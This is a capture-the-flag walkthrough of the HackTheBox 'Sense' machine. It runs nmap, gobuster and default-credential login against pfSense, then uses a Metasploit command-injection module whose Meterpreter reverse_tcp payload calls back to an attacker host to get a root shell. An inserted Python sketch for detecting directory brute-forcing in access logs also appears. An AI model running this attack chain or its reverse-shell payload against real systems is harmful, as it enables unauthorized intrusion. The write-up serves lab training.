Sense HackTheBox WalkThrough

This is a walkthrough of the Sense HackTheBox machine, the 18th machine in our OSCP-like HTB Boxes series. In this writeup I demonstrate step by step how I rooted the Sense HackTheBox machine. Before diving into the hacking part, here is some background on the box: it is a FreeBSD machine with IP address 10.10.10.60, rated easy by its maker.

Since this machine is retired on the HackTheBox platform, you will need a VIP subscription to access it. First, connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging the machine's IP address, 10.10.10.60. If all goes well, start hacking.

As usual, I started by scanning the machine with Nmap. Scanning gives us an idea of how to proceed: it finds open and closed ports and tells us which services are running on them. I used Nmap for this task and the result is given below:

Scanning

$ nmap -sC -sV -oA nmap/sense 10.10.10.60

$ cat nmap/sense.nmap

Nmap result during Sense Hackthebox walkthrough

Nmap found ports 80 and 443 open. Let us enumerate these ports. The Lighttpd 1.4.35 web server is running on port 80. Let us pass the sense.xml file, which Nmap's -oA switch created, to searchsploit (a tool to query exploit-db offline) to check for available exploits on exploit-db.

Searching Available Exploits

$ searchsploit --nmap nmap/sense.xml

Exporting Nmap result to searchsploit

Searchsploit found multiple exploits for Lighttpd, but none suitable for our current version. Since a web server is running on ports 80 and 443, there must be one or more websites at http://10.10.10.60 and https://10.10.10.60. On going to http://10.10.10.60 I got redirected to https://10.10.10.60 and found a pfSense login page (pfSense is an open source firewall/router software distribution based on FreeBSD).

Pfsense login page

Since it is the login page of a well-known web application, my next step as usual was to try logging in with default credentials like admin: admin, admin: password and admin: kfsense, because admins sometimes forget to change the application's default credentials. I did the same this time too, but none of them worked. I checked the page source by pressing CTRL+U for some kind of hint but found nothing interesting. So nothing was left except directory bruteforcing and fuzzing.

I then performed directory bruteforcing on https://10.10.10.60/ using gobuster (a directory bruteforcer) with the extension txt and the wordlist directory-list-2.3-medium.txt (this wordlist can be found in the SecLists directory).

Performing Directory Bruteforcing

$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -u https://10.10.10.60 -n -x txt -t 50 -s 200

Performing directory bruteforcing in sense htb

Directory bruteforcing found two text files, changelog.txt and system-users.txt. Visiting system-users.txt at http://10.10.10.60/system-users.txt revealed some information about a username and password.

Content of System-Users.txt file in Sense Hackthebox writeup
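Seen from the server side, a scan like the gobuster run above leaves a burst of 404 responses from one client followed by a few 200s for the files it discovered. The Python sketch below is an added example, not part of the original writeup: it flags such a client in a web access log and lists the paths it successfully retrieved. The log layout, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log layout: client first, [timestamp], "METHOD path proto", status.
LINE = re.compile(r'^(\S+) .*?\[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
WINDOW = timedelta(seconds=10)  # assumed thresholds; tune to real traffic
MIN_REQUESTS = 20
MIN_404_RATIO = 0.9

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, _method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(status)

def detect(lines):
    """Map each brute-forcing client to the paths it got a 200 for."""
    per_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        per_ip[rec[0]].append(rec[1:])
    findings = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e[0])
        start = 0
        for end, (when, _path, _status) in enumerate(events):
            while when - events[start][0] > WINDOW:
                start += 1  # slide the window forward in time
            window = events[start:end + 1]
            misses = sum(1 for e in window if e[2] == 404)
            if len(window) >= MIN_REQUESTS and misses / len(window) >= MIN_404_RATIO:
                findings[ip] = sorted({p for _, p, s in events if s == 200})
                break
    return findings

def sample_log():
    """Constructed sample: one scanner-like client and one ordinary client."""
    fmt = '{} 10.10.10.60 - [10/Mar/2021:12:00:{:02d} +0000] "GET {} HTTP/1.1" {} 345 "-" "-"'
    log = [fmt.format("10.10.14.3", i // 10, f"/word{i}.txt", 404) for i in range(40)]
    log += [fmt.format("10.10.14.3", 4, p, 200) for p in ("/changelog.txt", "/system-users.txt")]
    log += [fmt.format("192.0.2.10", 5, "/index.php", 200) for _ in range(3)]
    log.append(fmt.format("192.0.2.10", 6, "/favicon.ico", 404))
    return log

if __name__ == "__main__":
    for client, hits in detect(sample_log()).items():
        print(client, "probed the server and retrieved:", hits)
```

The list of retrieved paths is the part that matters for response: any file on it, such as a notes file containing account details, should be treated as disclosed.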

The username is Rohit and the password points to the company's default password. After some googling, I found that the default password of pfSense is pfsense. When I tried to log in with the credentials rohit: pfsense at https://10.10.10.60/, the login succeeded. The installed version of pfSense is 2.1.3-RELEASE.

Dashboard of pfsense

As soon as I know an application and its version, my next step is to search the internet for available vulnerabilities and exploits. This time I used the exploit search engine https://sploitus.com. It listed multiple authenticated RCE exploits, and there is also a Metasploit module. After searching for pfsense in Metasploit I found the exploit/unix/http/pfsense_graph_injection_exec module, which worked and got me a shell. There are also other ways to exploit this vulnerability without Metasploit. You can mirror the exploit from exploit-db using searchsploit with the command $ searchsploit -m php/webapps/43560.py or download it from the Packetstormsecurity website.

Searching for available exploit in sense htb walkthrough

Let us get user shell using Metasploit.

Getting User Shell

msf6 > search pfsense

msf6 > use exploit/unix/http/pfsense_graph_injection_exec

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PASSWORD pfsense

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.14.3

msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit

meterpreter > sysinfo

meterpreter > getuid

Getting user shell in sense htb

We have got a shell, and with root user privileges at that, which means we don't have to perform the privilege escalation we usually do. The root user is just like God in FreeBSD and UNIX-like OSes. Let us capture the user and root flags.

Capture User Flag

meterpreter > cat /home/rohit/user.txt

Capturing user flag during Sense Hackthebox walkthrough

Capture Root Flag

meterpreter > cat /root/root.txt

Capturing root flag during Sense Hackthebox walkthrough

This was how I rooted the Pfsense HackTheBox machine. I hope you learned something from this machine walkthrough. Feel free to ask your doubts in the comment section if you have any. Thanks for reading this article. For any queries and suggestions related to the walkthrough, contact us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player at night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/